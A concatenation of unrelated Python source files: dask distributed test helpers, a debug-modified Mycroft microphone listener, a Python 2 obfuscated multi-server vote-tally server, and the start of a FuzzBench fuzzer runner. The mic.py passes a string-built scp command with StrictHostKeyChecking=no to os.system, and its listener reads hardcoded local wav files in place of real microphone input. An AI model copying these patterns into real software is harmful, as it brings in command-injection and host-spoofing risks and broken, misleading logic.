assert isinstance(s, Scheduler)
for w in [a, b]:
assert isinstance(w, Worker)
@pytest.mark.parametrize("foo", [True])
@gen_cluster(client=True)
async def test_gen_cluster_parametrized_variadic_workers(c, s, *workers, foo):
assert foo is True
assert isinstance(c, Client)
assert isinstance(s, Scheduler)
for w in workers:
assert isinstance(w, Worker)
@gen_cluster(
client=True,
Worker=Nanny,
config={"distributed.comm.timeouts.connect": "1s", "new.config.value": "foo"},
)
async def test_gen_cluster_set_config_nanny(c, s, a, b):
def assert_config():
import dask
assert dask.config.get("distributed.comm.timeouts.connect") == "1s"
assert dask.config.get("new.config.value") == "foo"
return dask.config
await c.run(assert_config)
await c.run_on_scheduler(assert_config)
@gen_cluster(client=True)
def test_gen_cluster_legacy_implicit(c, s, a, b):
assert isinstance(c, Client)
assert isinstance(s, Scheduler)
for w in [a, b]:
assert isinstance(w, Worker)
assert s.nthreads == {w.address: w.nthreads for w in [a, b]}
assert (yield c.submit(lambda: 123)) == 123
@gen_cluster(client=True)
@gen.coroutine
def test_gen_cluster_legacy_explicit(c, s, a, b):
assert isinstance(c, Client)
assert isinstance(s, Scheduler)
for w in [a, b]:
assert isinstance(w, Worker)
assert s.nthreads == {w.address: w.nthreads for w in [a, b]}
assert (yield c.submit(lambda: 123)) == 123
@pytest.mark.skip(reason="This hangs on travis")
def test_gen_cluster_cleans_up_client(loop):
import dask.context
assert not dask.config.get("get", None)
@gen_cluster(client=True)
async def f(c, s, a, b):
assert dask.config.get("get", None)
await c.submit(inc, 1)
f()
assert not dask.config.get("get", None)
@gen_cluster()
async def test_gen_cluster_without_client(s, a, b):
assert isinstance(s, Scheduler)
for w in [a, b]:
assert isinstance(w, Worker)
assert s.nthreads == {w.address: w.nthreads for w in [a, b]}
async with Client(s.address, asynchronous=True) as c:
future = c.submit(lambda x: x + 1, 1)
result = await future
assert result == 2
@gen_cluster(
client=True,
scheduler="tls://127.0.0.1",
nthreads=[("tls://127.0.0.1", 1), ("tls://127.0.0.1", 2)],
security=tls_only_security(),
)
async def test_gen_cluster_tls(e, s, a, b):
assert isinstance(e, Client)
assert isinstance(s, Scheduler)
assert s.address.startswith("tls://")
for w in [a, b]:
assert isinstance(w, Worker)
assert w.address.startswith("tls://")
assert s.nthreads == {w.address: w.nthreads for w in [a, b]}
@gen_test()
async def test_gen_test():
await asyncio.sleep(0.01)
@gen_test()
def test_gen_test_legacy_implicit():
yield asyncio.sleep(0.01)
@gen_test()
@gen.coroutine
def test_gen_test_legacy_explicit():
yield asyncio.sleep(0.01)
@contextmanager
def _listen(delay=0):
serv = socket.socket()
serv.bind(("127.0.0.1", 0))
e = threading.Event()
def do_listen():
e.set()
sleep(delay)
serv.listen(5)
ret = serv.accept()
if ret is not None:
cli, _ = ret
cli.close()
serv.close()
t = threading.Thread(target=do_listen)
t.daemon = True
t.start()
try:
e.wait()
sleep(0.01)
yield serv
finally:
t.join(5.0)
def test_wait_for_port():
t1 = time()
with pytest.raises(RuntimeError):
wait_for_port((get_ip(), 9999), 0.5)
t2 = time()
assert t2 - t1 >= 0.5
with _listen(0) as s1:
t1 = time()
wait_for_port(s1.getsockname())
t2 = time()
assert t2 - t1 <= 1.0
with _listen(1) as s1:
t1 = time()
wait_for_port(s1.getsockname())
t2 = time()
assert t2 - t1 <= 2.0
def test_new_config():
c = config.copy()
with new_config({"xyzzy": 5}):
config["xyzzy"] == 5
assert config == c
assert "xyzzy" not in config
def test_lingering_client():
@gen_cluster()
async def f(s, a, b):
await Client(s.address, asynchronous=True)
f()
with pytest.raises(ValueError):
default_client()
def test_lingering_client_2(loop):
with cluster() as (s, [a, b]):
client = Client(s["address"], loop=loop)
def test_tls_cluster(tls_client):
tls_client.submit(lambda x: x + 1, 10).result() == 11
assert tls_client.security
@pytest.mark.asyncio
async def test_tls_scheduler(security, cleanup):
async with Scheduler(
security=security, host="localhost", dashboard_address=":0"
) as s:
assert s.address.startswith("tls")
|
mic.py | # Copyright 2017 Mycroft AI Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import audioop
import collections
import datetime
import shutil
from tempfile import gettempdir
from threading import Thread, Lock
from time import sleep, time as get_time
import os
import pyaudio
import unicodedata
import speech_recognition
from os import mkdir
from os.path import isdir, join, expanduser, isfile
from speech_recognition import (
Microphone,
AudioSource,
AudioData
)
from mycroft.configuration import ConfigurationManager
from mycroft.session import SessionManager
from mycroft.util import (
check_for_signal,
get_ipc_directory,
resolve_resource_file,
play_wav
)
import speech_recognition as sr
from mycroft.util.log import LOG
import time
class MutableStream(object):
def __init__(self, wrapped_stream, format, muted=False):
assert wrapped_stream is not None
self.wrapped_stream = wrapped_stream
self.muted = muted
self.SAMPLE_WIDTH = pyaudio.get_sample_size(format)
self.muted_buffer = b''.join([b'\x00' * self.SAMPLE_WIDTH])
def mute(self):
self.muted = True
def unmute(self):
self.muted = False
def read(self, size):
frames = collections.deque()
remaining = size
while remaining > 0:
to_read = min(self.wrapped_stream.get_read_available(), remaining)
if to_read == 0:
sleep(.01)
continue
result = self.wrapped_stream.read(to_read)
frames.append(result)
remaining -= to_read
if self.muted:
return self.muted_buffer
input_latency = self.wrapped_stream.get_input_latency()
if input_latency > 0.2:
LOG.warning("High input latency: %f" % input_latency)
audio = b"".join(list(frames))
return audio
def close(self):
self.wrapped_stream.close()
self.wrapped_stream = None
def is_stopped(self):
return self.wrapped_stream.is_stopped()
def stop_stream(self):
return self.wrapped_stream.stop_stream()
class MutableMicrophone(Microphone):
def __init__(self, device_index=None, sample_rate=16000, chunk_size=1024,
mute=False):
Microphone.__init__(
self, device_index=device_index, sample_rate=sample_rate,
chunk_size=chunk_size)
self.muted = False
if mute:
self.mute()
def __enter__(self):
assert self.stream is None, \
"This audio source is already inside a context manager"
self.audio = pyaudio.PyAudio()
self.stream = MutableStream(self.audio.open(
input_device_index=self.device_index, channels=1,
format=self.format, rate=self.SAMPLE_RATE,
frames_per_buffer=self.CHUNK,
input=True, # stream is an input stream
), self.format, self.muted)
return self
def __exit__(self, exc_type, exc_value, traceback):
if not self.stream.is_stopped():
self.stream.stop_stream()
self.stream.close()
self.stream = None
self.audio.terminate()
def mute(self):
self.muted = True
if self.stream:
self.stream.mute()
def unmute(self):
self.muted = False
if self.stream:
self.stream.unmute()
def is_muted(self):
return self.muted
class ResponsiveRecognizer(speech_recognition.Recognizer):
# Padding of silence when feeding to pocketsphinx
SILENCE_SEC = 0.01
COUNT_TURNS = 0
# The minimum seconds of noise before a
# phrase can be considered complete
MIN_LOUD_SEC_PER_PHRASE = 0.5
# The minimum seconds of silence required at the end
# before a phrase will be considered complete
MIN_SILENCE_AT_END = 0.25
# The maximum seconds a phrase can be recorded,
# provided there is noise the entire time
RECORDING_TIMEOUT = 10.0
# The maximum time it will continue to record silence
# when not enough noise has been detected
RECORDING_TIMEOUT_WITH_SILENCE = 3.0
# Time between pocketsphinx checks for the wake word
SEC_BETWEEN_WW_CHECKS = 0.2
def __init__(self, wake_word_recognizer, hot_word_engines=None):
if hot_word_engines is None:
hot_word_engines = {}
self.config = ConfigurationManager.instance()
listener_config = self.config.get('listener')
self.upload_config = listener_config.get('wake_word_upload')
self.wake_word_name = listener_config['wake_word']
# The maximum audio in seconds to keep for transcribing a phrase
# The wake word must fit in this time
num_phonemes = wake_word_recognizer.num_phonemes
len_phoneme = listener_config.get('phoneme_duration', 120) / 1000.0
self.TEST_WW_SEC = int(num_phonemes * len_phoneme)
self.SAVED_WW_SEC = (10 if self.upload_config['enable']
else self.TEST_WW_SEC)
speech_recognition.Recognizer.__init__(self)
self.wake_word_recognizer = wake_word_recognizer
self.audio = pyaudio.PyAudio()
self.multiplier = listener_config.get('multiplier')
self.energy_ratio = listener_config.get('energy_ratio')
# check the config for the flag to save wake words.
self.save_utterances = listener_config.get('record_utterances', False)
self.save_wake_words = listener_config.get('record_wake_words', False) \
or self.upload_config['enable'] or self.config['opt_in']
self.upload_lock = Lock()
self.save_wake_words_dir = join(gettempdir(), 'mycroft_wake_words')
self.filenames_to_upload = []
self.mic_level_file = os.path.join(get_ipc_directory(), "mic_level")
self._stop_signaled = False
self.hot_word_engines = hot_word_engines
@staticmethod
def record_sound_chunk(source):
return source.stream.read(source.CHUNK)
@staticmethod
def calc_energy(sound_chunk, sample_width):
return audioop.rms(sound_chunk, sample_width)
def _record_phrase(self, source, sec_per_buffer):
"""Record an entire spoken phrase.
Essentially, this code waits for a period of silence and then returns
the audio. If silence isn't detected, it will terminate and return
a buffer of RECORDING_TIMEOUT duration.
Args:
source (AudioSource): Source producing the audio chunks
sec_per_buffer (float): Fractional number of seconds in each chunk
Returns:
bytearray: complete audio buffer recorded, including any
silence at the end of the user's utterance
"""
num_loud_chunks = 0
noise = 0
max_noise = 25
min_noise = 0
silence_duration = 0
def increase_noise(level):
if level < max_noise:
return level + 200 * sec_per_buffer
return level
def decrease_noise(level):
if level > min_noise:
return level - 100 * sec_per_buffer
return level
# Smallest number of loud chunks required to return
min_loud_chunks = int(self.MIN_LOUD_SEC_PER_PHRASE / sec_per_buffer)
# Maximum number of chunks to record before timing out
max_chunks = int(self.RECORDING_TIMEOUT / sec_per_buffer)
num_chunks = 0
# Will return if exceeded this even if there's not enough loud chunks
max_chunks_of_silence = int(self.RECORDING_TIMEOUT_WITH_SILENCE /
sec_per_buffer)
# bytearray to store audio in
byte_data = '\0' * source.SAMPLE_WIDTH
phrase_complete = False
while num_chunks < max_chunks and not phrase_complete:
chunk = self.record_sound_chunk(source)
byte_data += chunk
num_chunks += 1
energy = self.calc_energy(chunk, source.SAMPLE_WIDTH)
test_threshold = self.energy_threshold * self.multiplier
is_loud = energy > test_threshold
if is_loud:
noise = increase_noise(noise)
num_loud_chunks += 1
else:
noise = decrease_noise(noise)
self._adjust_threshold(energy, sec_per_buffer)
if num_chunks % 10 == 0:
with open(self.mic_level_file, 'w') as f:
f.write("Energy: cur=" + str(energy) + " thresh=" +
str(self.energy_threshold))
f.close()
was_loud_enough = num_loud_chunks > min_loud_chunks
quiet_enough = noise <= min_noise
if quiet_enough:
silence_duration += sec_per_buffer
if silence_duration < self.MIN_SILENCE_AT_END:
quiet_enough = False # gotta be silent for min of 1/4 sec
else:
silence_duration = 0
recorded_too_much_silence = num_chunks > max_chunks_of_silence
if quiet_enough and (was_loud_enough or recorded_too_much_silence):
phrase_complete = True
# Pressing top-button will end recording immediately
if check_for_signal('buttonPress'):
phrase_complete = True
return byte_data
@staticmethod
def sec_to_bytes(sec, source):
return sec * source.SAMPLE_RATE * source.SAMPLE_WIDTH
def _skip_wake_word(self):
# Check if told programatically to skip the wake word, like
# when we are in a dialog with the user.
if check_for_signal('startListening'):
return True
# Pressing the Mark 1 button can start recording (unless
# it is being used to mean 'stop' instead)
if check_for_signal('buttonPress', 1):
# give other processes time to consume this signal if
# it was meant to be a 'stop'
sleep(0.25)
if check_for_signal('buttonPress'):
# Signal is still here, assume it was intended to
# begin recording
LOG.debug("Button Pressed, wakeword not needed")
return True
return False
def stop(self):
"""
Signal stop and exit waiting state.
"""
self._stop_signaled = True
def _upload_file(self, filename):
server = self.upload_config['server']
keyfile = resolve_resource_file('wakeword_rsa')
userfile = expanduser('~/.mycroft/wakeword_rsa')
if not isfile(userfile):
shutil.copy2(keyfile, userfile)
os.chmod(userfile, 0o600)
keyfile = userfile
address = self.upload_config['user'] + '@' + \
server + ':' + self.upload_config['folder']
self.upload_lock.acquire()
try:
self.filenames_to_upload.append(filename)
for i, fn in enumerate(self.filenames_to_upload):
LOG.debug('Uploading ' + fn + '...')
os.chmod(fn, 0o666)
cmd = 'scp -o StrictHostKeyChecking=no -P ' + \
str(self.upload_config['port']) + ' -i ' + \
keyfile + ' ' + fn + ' ' + address
if os.system(cmd) == 0:
del self.filenames_to_upload[i]
os.remove(fn)
else:
LOG.debug('Could not upload ' + fn + ' to ' + server)
finally:
self.upload_lock.release()
def read_wave_file(self, wave_file_path):
#reads the wave file at provided path and return the expectedAudio format
# use the audio file as the audio source
r = sr.Recognizer()
with sr.AudioFile(wave_file_path) as source:
audio = r.record(source)
return audio
def _wait_until_wake_word(self, source, sec_per_buffer, emitter):
"""Listen continuously on source until a wake word is spoken
Args:
source (AudioSource): Source producing the audio chunks
sec_per_buffer (float): Fractional number of seconds in each chunk
"""
#print("source is-->",source)
num_silent_bytes = int(self.SILENCE_SEC * source.SAMPLE_RATE *
source.SAMPLE_WIDTH)
"""
silence = '\0' * num_silent_bytes
# bytearray to store audio in
byte_data = silence
buffers_per_check = self.SEC_BETWEEN_WW_CHECKS / sec_per_buffer
buffers_since_check = 0.0
# Max bytes for byte_data before audio is removed from the front
max_size = self.sec_to_bytes(self.SAVED_WW_SEC, source)
test_size = self.sec_to_bytes(self.TEST_WW_SEC, source)
"""
said_wake_word = False
"""
# Rolling buffer to track the audio energy (loudness) heard on
# the source recently. An average audio energy is maintained
# based on these levels.
energies = []
idx_energy = 0
avg_energy = 0.0
energy_avg_samples = int(5 / sec_per_buffer) # avg over last 5 secs
counter = 0
"""
while not said_wake_word and not self._stop_signaled:
"""
if self._skip_wake_word():
break
chunk = self.record_sound_chunk(source)
# LOG.info("((((((check 1))))))))")
energy = self.calc_energy(chunk, source.SAMPLE_WIDTH)
if energy < self.energy_threshold * self.multiplier:
self._adjust_threshold(energy, sec_per_buffer)
if len(energies) < energy_avg_samples:
# build the average
energies.append(energy)
avg_energy += float(energy) / energy_avg_samples
else:
# maintain the running average and rolling buffer
avg_energy -= float(energies[idx_energy]) / energy_avg_samples
avg_energy += float(energy) / energy_avg_samples
energies[idx_energy] = energy
idx_energy = (idx_energy + 1) % energy_avg_samples
# maintain the threshold using average
if energy < avg_energy * 1.5:
if energy > self.energy_threshold:
# bump the threshold to just above this value
self.energy_threshold = energy * 1.2
# Periodically output energy level stats. This can be used to
# visualize the microphone input, e.g. a needle on a meter.
if counter % 3:
with open(self.mic_level_file, 'w') as f:
f.write("Energy: cur=" + str(energy) + " thresh=" +
str(self.energy_threshold))
f.close()
counter += 1
#LOG.info("((((((check 2))))))))")
# At first, the buffer is empty and must fill up. After that
# just drop the first chunk bytes to keep it the same size.
needs_to_grow = len(byte_data) < max_size
if needs_to_grow:
byte_data += chunk
else: # Remove beginning of audio and add new chunk to end
byte_data = byte_data[len(chunk):] + chunk
buffers_since_check += 1.0
if buffers_since_check > buffers_per_check:
buffers_since_check -= buffers_per_check
chopped = byte_data[-test_size:] \
if test_size < len(byte_data) else byte_data
#audio_data = chopped + silence
"""
r = sr.Recognizer()
print("speech recognition object -->", r)
audio_data = self.read_wave_file("/home/sg/wavFiles/software.wav")
wakeWord = r.recognize_sphinx(audio_data)
LOG.error("*********time before check for hotwords------>>>"+str(datetime.datetime.now()))
said_wake_word = self.check_for_hotwords(wakeWord, emitter)
LOG.error("*********time after check for hotwords------>>>"+str(datetime.datetime.now()))
"""
if said_wake_word:
payload = {
'hotword': self.wake_word_recognizer.key_phrase,
'start_listening': True,
'sound': resolve_resource_file(
self.config.get('sounds').get('start_listening')),
"engine": "pocketsphinx"
}
emitter.emit("recognizer_loop:hotword", payload)
# If enabled, play a wave file with a short sound
# to audibly indicate recording has begun.
if self.config.get('confirm_listening'):
file = resolve_resource_file(
self.config.get('sounds').get('start_listening'))
if file:
play_wav(file)
#sleep(10)
# if a wake word is success full then record audio in temp
# file.
if self.save_wake_words:
audio = self._create_audio_data(byte_data, source)
if not isdir(self.save_wake_words_dir):
mkdir(self.save_wake_words_dir)
dr = self.save_wake_words_dir
ww_module = self.wake_word_recognizer.__class__.__name__
ww = self.wake_word_name.replace(' ', '-')
md = str(abs(hash(ww_module)))
stamp = str(int(1000 * get_time()))
sid = SessionManager.get().session_id
uid = IdentityManager.get().uuid
fn = join(dr, '.'.join([ww, md, stamp, sid, uid]) + '.wav')
with open(fn, 'wb') as f:
f.write(audio.get_wav_data())
if self.upload_config['enable'] or self.config['opt_in']:
t = Thread(target=self._upload_file, args=(fn,))
t.daemon = True
t.start()
"""
def check_for_hotwords(self, wakeWord, emitter):
print("******Sentence passed is--->", wakeWord)
# check hot word
for hotword in self.hot_word_engines:
print("*************hotword is****>", hotword)
engine, ding, utterance, listen = self.hot_word_engines[hotword]
#found = wakeWord == hotword
LOG.error("typeof hotword::::"+str(type(hotword)))
LOG.error("typeof wakeWord::::"+str(type(wakeWord)))
hotword = unicodedata.normalize('NFKD', hotword).encode('ascii','ignore')
LOG.error("new hotword:::"+hotword+ " res "+str(wakeWord == hotword))
if hotword.lower() in wakeWord.lower():
LOG.error("Hot Word detected time: "+ str(datetime.datetime.now()))
#self.finalHotWord = wakeWord
fileName = "hotWordFile.txt"
file = open(fileName,"w")
file.write(hotword.lower())
file.close()
# If enabled, play a wave file with a short sound to audibly
# indicate hotword was detected.
"""
if ding:
try:
file = resolve_resource_file(ding)
if file:
play_wav(file)
except Exception as e:
print e
"""
# Hot Word succeeded
payload = {
'hotword': hotword,
'start_listening': listen,
'sound': ding,
"engine": "pocketsphinx"
}
emitter.emit("recognizer_loop:hotword", payload)
if utterance:
# send the transcribed word on for processing
payload = {
'utterances': [utterance]
}
emitter.emit("recognizer_loop:utterance", payload)
if listen:
# start listening
return True
return False
@staticmethod
def _create_audio_data(raw_data, source):
"""
Constructs an AudioData instance with the same parameters
as the source and the specified frame_data
"""
return AudioData(raw_data, source.SAMPLE_RATE, source.SAMPLE_WIDTH)
def listen(self, source, emitter):
"""Listens for chunks of audio that Mycroft should perform STT on.
This will listen continuously for a wake-up-word, then return the
audio chunk containing the spoken phrase that comes immediately
afterwards.
Args:
source (AudioSource): Source producing the audio chunks
emitter (EventEmitter): Emitter for notifications of when recording
begins and ends.
Returns:
AudioData: audio with the user's utterance, minus the wake-up-word
"""
assert isinstance(source, AudioSource), "Source must be an AudioSource"
# bytes_per_sec = source.SAMPLE_RATE * source.SAMPLE_WIDTH
sec_per_buffer = float(source.CHUNK) / source.SAMPLE_RATE
# Every time a new 'listen()' request begins, reset the threshold
# used for silence detection. This is as good of a reset point as
# any, as we expect the user and Mycroft to not be talking.
# NOTE: adjust_for_ambient_noise() doc claims it will stop early if
# speech is detected, but there is no code to actually do that.
self.adjust_for_ambient_noise(source, 1.0)
#LOG.debug("Waiting for wake word...")
#LOG.debug("****source is-->", source)
time.sleep(1)
self._wait_until_wake_word(source, sec_per_buffer, emitter)
if self._stop_signaled:
return
LOG.debug("Recording...")
emitter.emit("recognizer_loop:record_begin")
# If enabled, play a wave file with a short sound to audibly
# indicate recording has begun.
if self.config.get('confirm_listening'):
file = resolve_resource_file(
self.config.get('sounds').get('start_listening'))
if file:
play_wav(file)
frame_data = self._record_phrase(source, sec_per_buffer)
#global COUNT_TURNS
#LOG.info("*******COUNT_TURNS******"+COUNT_TURNS)
#if(COUNT_TURNS % 2 == 0):
#audio_data = self.read_wave_file("/home/sg/wavFiles/software.wav")
#else:
LOG.error("main stt after wake word")
audio_data = self.read_wave_file("/home/sg/wavFiles/tellmemore.wav")
#COUNT_TURNS +=1
#audio_data = self._create_audio_data(frame_data, source)
emitter.emit("recognizer_loop:record_end")
if self.save_utterances:
LOG.info("Recording utterance")
stamp = str(datetime.datetime.now())
filename = "/tmp/mycroft_utterance%s.wav" % stamp
with open(filename, 'wb') as filea:
filea.write(audio_data.get_wav_data())
LOG.debug("Thinking...")
return audio_data
def _adjust_threshold(self, energy, seconds_per_buffer):
if self.dynamic_energy_threshold and energy > 0:
# account for different chunk sizes and rates
damping = (
self.dynamic_energy_adjustment_damping ** seconds_per_buffer)
target_energy = energy * self.energy_ratio
self.energy_threshold = (
self.energy_threshold * damping +
target_energy * (1 - damping))
|
server.py | import struct
import socket
import sys
from threading import Thread
import random
import copy #TEMP
from time import sleep #TEMP
from Queue import Queue
import time
STATES = 16
class Server:
def loadResultLut(path):
return 0
class RemoteServer(Server):
def __init__(self, ip=None, seed=None, riport=None, rvport=None, iport=None, vport=None, label=None, scheduler_port=None):
self.ip = ip
self.riport = riport
self.rvport = rvport
self.iport = iport
self.vport = vport
self.isock = None
self.iconn = None
self.iaddr = None
self.vsock = None
self.vconn = None
self.vaddr = None
self.random = random.Random()
self.random.seed(seed)
self.label = label
self.q = Queue()
self.scheduler_port = scheduler_port
def obfuscate(self, state):
return self.olut[state]
def connect(self):
self.risock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.rvsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.risock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
self.rvsock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
try:
self.risock.connect((self.ip, self.riport))
self.rvsock.connect((self.ip, self.rvport))
print 'Connected.'
return True
except:
return False
def stop(self):
self.risock.close()
self.rvsock.close()
def loadLut(self, path):
self.olut = []
f = open(path, 'rb')
while True:
b = f.read(1)
if not b:
break
self.olut.append(b)
f.close()
class LocalServer(Server):
def __init__(self, remote_servers):
self.a = remote_servers[0]
self.b = remote_servers[1]
self.c = remote_servers[2]
self.d = remote_servers[3]
self.e = remote_servers[4]
self.f = remote_servers[5]
self.voteaddQ = Queue()
self.vectorBQ = Queue()
def initiateTally(self, value, length):
assert(length % 3 == 0)
self.tally_length = length
self.tally = value
def startListeningIndex(self, remote_server):
remote_server.isock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
remote_server.isock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
remote_server.isock.bind(('0.0.0.0', remote_server.iport))
remote_server.isock.listen(0)
remote_server.iconn, remote_server.iaddr = remote_server.isock.accept()
print 'Listen Connected to %s' % remote_server.label
def listeningIndex(self, remote_servers):
# Should be: b,d,e,f
lthreads = []
for remote_server in [self.b, self.c, self.d, self.e, self.f]:
lt = Thread(target=self.startListeningIndex, args=(remote_server,))
lt.start()
lthreads.append(lt)
for lt in lthreads:
lt.join()
print 'All joined'
row_bytes_inorder = []
for k in range(3):
row_bytes_inorder.append(k)
states_x_pre = 3 * 3 * 3
while True:
indexes = []
for remote_server in remote_servers:
b1 = remote_server.iconn.recv(1)
if len(b1) == 0:
return
indexes.append(struct.unpack("<B", b1)[0])
#osb = remote_servers[0].q.get()
osb = self.vectorBQ.get()
osbf = 0
states_x = states_x_pre
oss = 0
for i in [1,2,3]:
oss += (states_x * indexes[i])
states_x = states_x / 3
i = 0
osbf = 0
osbi = 0
while i < 3:
j = 0
while j < 27:
row_bytes = copy.deepcopy(row_bytes_inorder)
remote_servers[0].random.shuffle(row_bytes)
osb_new = row_bytes.index(osb)
k = 0
while k < 3:
tmp_r = self.b.random.randint(0,STATES-1)
if i == indexes[0] and j*3 == oss and k == osb_new:
osbf = tmp_r
osbi = osb_new + oss
k += 1
j += 1
i += 1
remote_servers[0].iconn.sendall(struct.pack("<BB", osbi & 255, (osbi >> 8) & 255) + struct.pack("<B", (osbf & 255)))
sleep(5)
for remote_server in [self.b, self.c, self.d, self.e, self.f]:
remote_server.iconn.close()
print 'listeningIndex closing.'
sys.exit()
#thread.exit()
def startListeningMiniLUT(self, remote_server):
remote_server.vsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
remote_server.vsock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
remote_server.vsock.bind(('0.0.0.0', remote_server.vport))
remote_server.vsock.listen(0)
remote_server.vconn, remote_server.vaddr = remote_server.vsock.accept()
print 'listeningMiniLUT Connected to %s' % remote_server.label
def listeningMiniLUT(self, remote_servers):
#should be b,c,d,f in order f,b,c,d
lthreads = []
#for remote_server in remote_servers:
for remote_server in [self.b, self.c, self.d, self.e, self.f]:
lt = Thread(target=self.startListeningMiniLUT, args=(remote_server,))
lt.start()
lthreads.append(lt)
for lt in lthreads:
lt.join()
print 'All joined'
STATES5 = STATES * STATES * STATES * STATES * STATES
STATES4 = STATES * STATES * STATES * STATES
STATES3 = STATES * STATES * STATES
STATES2 = STATES * STATES
while True:
break_main = False
vectors = []
#for remote_server in remote_servers:
for remote_server in [self.f, self.b, self.c, self.d, self.e]:
b4 = remote_server.vconn.recv(3)
if len(b4) == 0:
break_main = True
break
vectors.append(struct.unpack("<BBB", b4))
if break_main:
break
osf = remote_servers[0].q.get() * STATES4
rbs = ''
j = 0
prev = None
for i0 in [0,1,2]:
b0 = osf + (vectors[0][i0] * STATES5)
for i1 in [0,1,2]:
b1 = b0 + (vectors[1][i1] * STATES3)
for i2 in [0,1,2]:
b2 = b1 + (vectors[2][i2] * STATES2)
for i3 in [0,1,2]:
b3 = b2+ (vectors[3][i3] * STATES)
row_bytes = [0,0,0]
for i4 in [0,1,2]:
i = b3 + (vectors[4][i4])
row_bytes[i4] = self.result_lut[i]
self.f.random.shuffle(row_bytes)
rb1 = row_bytes[0]
rb2 = row_bytes[1]
rb3 = row_bytes[2]
tmp_r1 = self.f.random.randint(0,STATES-1)
tmp_r2 = self.f.random.randint(0,STATES-1)
tmp_r3 = self.f.random.randint(0,STATES-1)
rbs += struct.pack("<B", (struct.unpack("<B", rb1)[0] ^ tmp_r1))
rbs += struct.pack("<B", (struct.unpack("<B", rb2)[0] ^ tmp_r2))
rbs += struct.pack("<B", (struct.unpack("<B", rb3)[0] ^ tmp_r3))
remote_servers[0].vconn.sendall(rbs)
sleep(5)
for remote_server in [self.b, self.c, self.d, self.e, self.f]:
remote_server.iconn.close()
print 'listeningMiniLUT closing.'
sys.exit()
def listen(self):
self.lithread = Thread(target = self.listeningIndex, args = ([self.b, self.d, self.e, self.f],))
self.mlthread = Thread(target = self.listeningMiniLUT, args = ([self.f, self.b, self.c, self.d],))
self.avthread = Thread(target = self.addVote, args = ())
self.lithread.start()
self.mlthread.start()
self.avthread.start()
def loadResultLut(self, path):
self.result_lut = []
f = open(path, 'rb')
while True:
b = f.read(1)
if not b:
break
self.result_lut.append(b)
f.close()
def parreduces(self, pstates):
pvis = []
for states in pstates:
my_vis = []
sends_rv = {}
sends_ri = {}
for remote_server in [self.b, self.c, self.d, self.e, self.f]:
sends_rv[remote_server] = ""
sends_ri[remote_server] = ""
for state in states:
osa = self.a.obfuscate(state)
osb = self.b.obfuscate(state)
osc = self.c.obfuscate(state)
osd = self.d.obfuscate(state)
ose = self.e.obfuscate(state)
#for remote_server in [self.b, self.c, self.d, self.e, self.f]:
for remote_server in [self.c, self.d, self.e, self.f]:
remote_server.q.put(struct.unpack("<B", remote_server.obfuscate(state))[0])
my_vi = -1
for osx in [[osa, self.b, self.f], [osb, self.c, None], [osc, self.d, self.b], [osd, self.e, self.c], [ose, self.f, self.d]]:
vec = [osx[0]]
i = 0
while i < 2:
r = struct.pack("<B", random.randint(0, STATES - 1))
if r not in vec:
vec.append(r)
i += 1
random.shuffle(vec)
vi = vec.index(osx[0])
if my_vi == -1:
my_vi = vi
sends_rv[osx[1]] += vec[0]+vec[1]+vec[2]
if osx[2] == None:
self.vectorBQ.put(vi)
else:
sends_ri[osx[2]] += struct.pack("<B", vi)
my_vis.append(my_vi)
pvis.append(my_vis)
for remote_server in [self.b, self.c, self.d, self.e, self.f]:
remote_server.rvsock.sendall(sends_rv[remote_server])
remote_server.risock.sendall(sends_ri[remote_server])
presults = []
for pi in range(len(pstates)):
rstates = []
for si in range(len(states)):
index = struct.unpack("<BB", self.f.risock.recv(2))
index = (index[1] << 8) + index[0]
flip = struct.unpack("<B", self.f.risock.recv(1))[0]
rows = self.b.rvsock.recv(243)
small_lut = rows[81 * (pvis[pi][si]): 81 * (pvis[pi][si]) + 81]
rstates.append((struct.unpack("<B", small_lut[index])[0] ^ flip))
# TODO: Check for invalid state
presults.append(rstates)
return presults
def addVote(self):
sleep(10)
tally_window = []
carry_window = []
vote_window_len = self.tally_length / 3
tand = 7
for i in range(vote_window_len):
tally_window.append((self.tally & tand) >> (i * 3))
carry_window.append(None)
while True:
carry_window[0] = self.voteaddQ.get()
states = []
for i in range(vote_window_len):
carry = carry_window[i]
if carry == None:
continue
states.append(tally_window[i] + (carry << 3))
rstates = self.parreduces([states])[0]
rsi = 0
for i in range(vote_window_len):
if carry_window[i] == None:
continue
carry_window[i] = rstates[rsi] & 1
tally_window[i] = (rstates[rsi] >> 1)
rsi += 1
for i in range(vote_window_len-1, 0, -1):
carry_window[i] = carry_window[i-1]
print tally_window
|
runner.py | #!/usr/bin/env python3
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Runs fuzzer for trial."""
from collections import namedtuple
import os
import posixpath
import shlex
import shutil
import subprocess
import sys
import tarfile
import threading
import time
import zipfile
from common import environment
from common import experiment_utils
from common import filesystem
from common import fuzzer_utils
from common import gsutil
from common import logs
from common import new_process
from common import retry
from common import utils
NUM_RETRIES = 3
RETRY_DELAY = 3
FUZZ_TARGET_DIR = '/out'
# This is an optimization to sync corpora only when it is needed. These files
# are temporary files generated during fuzzer runtime and are not related to
# the actual corpora.
EXCLUDE_PATHS = set([
# AFL excludes.
'.cur_input',
'.state',
'fuzz_bitmap',
'fuzzer_stats',
'plot_data',
# QSYM excludes.
'bitmap',
])
CORPUS_ELEMENT_BYTES_LIMIT = 1 * 1024 * 1024
